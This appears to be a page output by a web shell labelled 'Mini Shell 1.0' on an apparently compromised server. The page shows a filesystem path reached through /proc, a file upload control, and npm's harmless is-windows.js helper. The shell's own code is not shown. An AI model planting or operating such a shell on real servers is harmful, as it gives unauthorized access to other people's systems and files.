HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/npm/lib/utils/
Upload File :
Current File : //proc/1991111/root/usr/share/npm/lib/utils/is-windows.js
const isWindows = process.platform === 'win32'
const isWindowsShell = isWindows &&
  !/^MINGW(32|64)$/.test(process.env.MSYSTEM) && process.env.TERM !== 'cygwin'

exports.isWindows = isWindows
exports.isWindowsShell = isWindowsShell